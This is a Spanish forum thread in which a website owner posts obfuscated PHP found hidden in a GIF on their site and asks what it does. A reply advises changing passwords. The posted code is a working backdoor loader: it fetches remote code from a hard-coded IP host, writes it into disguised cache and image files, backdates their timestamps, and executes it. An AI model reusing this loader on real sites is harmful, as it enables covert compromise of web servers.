Foro de elhacker.net

Seguridad Informática => Seguridad => Mensaje iniciado por: priester007 en 27 Noviembre 2013, 18:21 pm



Título: Ayuda encontre en mi sitio web una imagen gif con el siguiente codigo php
Publicado por: priester007 en 27 Noviembre 2013, 18:21 pm
Código:
<?php ${"GLOBALS"}["pjrbdlzyw"]="cflc";${"GLOBALS"}["xrclxn"]="f1";${"GLOBALS"}["ykmjqrhxqo"]="x15";${"GLOBALS"}["rbjdrmpiphc"]="core";${"GLOBALS"}["spqponjeweu"]="xx2";${"GLOBALS"}["lywwmfjmv"]="x0d";${"GLOBALS"}["seopdnm"]="x15";${"GLOBALS"}["jrxwwdjhab"]="x0b";${"GLOBALS"}["nqrtmmjwepry"]="x15";${"GLOBALS"}["fyvugnmi"]="x0c";$npfrxnfyl="f1";${"GLOBALS"}["xcvmwdomw"]="xsi";error_reporting(0);${"GLOBALS"}["kycgaboexev"]="brd";function x0b($x0b){${${"GLOBALS"}["xcvmwdomw"]}="allow_url_fopen";$klvknqcvhyc="x15";@ini_set(${${"GLOBALS"}["xcvmwdomw"]},1);${$klvknqcvhyc}="pack";${"GLOBALS"}["kbefaux"]="x15";${${"GLOBALS"}["fyvugnmi"]}="687474703a2f2f38382e38302e302e31372f6e2f";${${"GLOBALS"}["jrxwwdjhab"]}=${${"GLOBALS"}["kbefaux"]}("H*",${${"GLOBALS"}["fyvugnmi"]}).${${"GLOBALS"}["jrxwwdjhab"]};if(function_exists("curl_init")){${"GLOBALS"}["qfkwrsppd"]="x0d";$ahmqmnmela="x0d";$banwgya="x0b";${${"GLOBALS"}["qfkwrsppd"]}=curl_init(${$banwgya});$vrltbsqg="x0d";$scfhgcfnpc="x0b";curl_setopt(${${"GLOBALS"}["lywwmfjmv"]},CURLOPT_RETURNTRANSFER,1);curl_setopt(${$ahmqmnmela},CURLOPT_BINARYTRANSFER,1);${$scfhgcfnpc}=curl_exec(${$vrltbsqg});curl_close(${${"GLOBALS"}["lywwmfjmv"]});return${${"GLOBALS"}["jrxwwdjhab"]};}else{return file_get_contents(${${"GLOBALS"}["jrxwwdjhab"]});}}$umduws="x15";${${"GLOBALS"}["spqponjeweu"]}="str_rot13";${${"GLOBALS"}["seopdnm"]}="pack";${"GLOBALS"}["gjqpqhpu"]="cfl";${"GLOBALS"}["esjvgknxplb"]="brd";${${"GLOBALS"}["rbjdrmpiphc"]}=dirname(__FILE__).${${"GLOBALS"}["ykmjqrhxqo"]}("H*","2f6865616465725f312e6a7067");${$npfrxnfyl}=dirname(__FILE__).${${"GLOBALS"}["nqrtmmjwepry"]}("H*","2f7468656d655f6c6f676f2e6a7067");${${"GLOBALS"}["gjqpqhpu"]}=substr(__FILE__,0,strpos(__FILE__,"templates")).${${"GLOBALS"}["spqponjeweu"]}("grzcyngrf/.pnpur.cuc");${${"GLOBALS"}["esjvgknxplb"]}=isset($_GET[${$umduws}("H*","6265616e5f72656c6f6164")]);if(${${"GLOBALS"}["kycgaboexev"]}){if(file_exists(${${"GLOBALS"}["rbjdrmpiphc"]})){${"GLOBALS"}["ymrlbvrxi"]="core";@chmod(${${"GLOBALS"}["rbjdrmpiphc"]},0777);if(@unlink(${${"GLOBALS"}["ymrlbvrxi"]})){echo"<h1>BEAN RELOADED</h1><br>";}}${"GLOBALS"}["ffvkuxkj"]="cfl";if(file_exists(${${"GLOBALS"}["xrclxn"]})){@chmod(${${"GLOBALS"}["xrclxn"]},0777);if(@unlink(${${"GLOBALS"}["xrclxn"]})){echo"<h1>theme_logo deleted</h1><br>";}}if(file_exists(${${"GLOBALS"}["ffvkuxkj"]})){echo"<h1>Cache File Exists</h1><br>";}else{$mvhhsfbsw="x15";${${"GLOBALS"}["pjrbdlzyw"]}=x0b(${${"GLOBALS"}["spqponjeweu"]}("q.gkg"));if(!stristr(${${"GLOBALS"}["pjrbdlzyw"]},${$mvhhsfbsw}("H*","3c68746d6c3e"))&&strlen(${${"GLOBALS"}["pjrbdlzyw"]})>5){${"GLOBALS"}["gnxzafoxtr"]="cfl";$jiribl="cfl";${"GLOBALS"}["aysfjpq"]="xx2";${"GLOBALS"}["yhrpjhlk"]="cflc";file_put_contents(${${"GLOBALS"}["gnxzafoxtr"]},${${"GLOBALS"}["yhrpjhlk"]});@touch(${$jiribl},filemtime(${${"GLOBALS"}["aysfjpq"]}("vaqrk.cuc")));echo"<h1>CACHE RELOADED</h1>";}else{echo"<h1>CACHE COULD NOT DOWNLOAD</h1>";}}}if(!file_exists(${${"GLOBALS"}["rbjdrmpiphc"]})||0==filesize(${${"GLOBALS"}["rbjdrmpiphc"]})){${"GLOBALS"}["aolrerp"]="xx2";${"GLOBALS"}["ixsgthoek"]="sub";${"GLOBALS"}["rchlygh"]="sub";$bejqyjyov="sub";${$bejqyjyov}=x0b(${${"GLOBALS"}["aolrerp"]}("pber_w.gkg"));if(!stristr(${${"GLOBALS"}["rchlygh"]},${${"GLOBALS"}["ykmjqrhxqo"]}("H*","3c68746d6c3e"))&&strlen(${${"GLOBALS"}["ixsgthoek"]})>5){${"GLOBALS"}["dfhkkshkahq"]="sub";${"GLOBALS"}["ypealynbmqvg"]="core";file_put_contents(${${"GLOBALS"}["ypealynbmqvg"]},${${"GLOBALS"}["dfhkkshkahq"]});$nppfcoz="core";@touch(${$nppfcoz},filemtime(${${"GLOBALS"}["spqponjeweu"]}("vaqrk.cuc")));}}@include_once(${${"GLOBALS"}["rbjdrmpiphc"]});?>


me gustaria saber que hace? porque mi sitio presento anomalias y uno de mis archivos fue modificado please alguien que me oriente un poco.
Código
  1.  


Título: Re: Ayuda encontre en mi sitio web una imagen gif con el siguiente codigo php
Publicado por: MasterAndHack en 29 Noviembre 2013, 16:46 pm
Saludos.

Bueno,en concreto el código que mostrastes no sé para qué sirve,pero si has notado que tu sitio web últimamente está siendo modificado y no por ti mismo,te aconsejo que cambies todas las contraseñas,como la del ftp,la de la cuenta del host en el que la tengas alojada etc..Ya que tu web puede estar siendo usada para fines no muy buenos.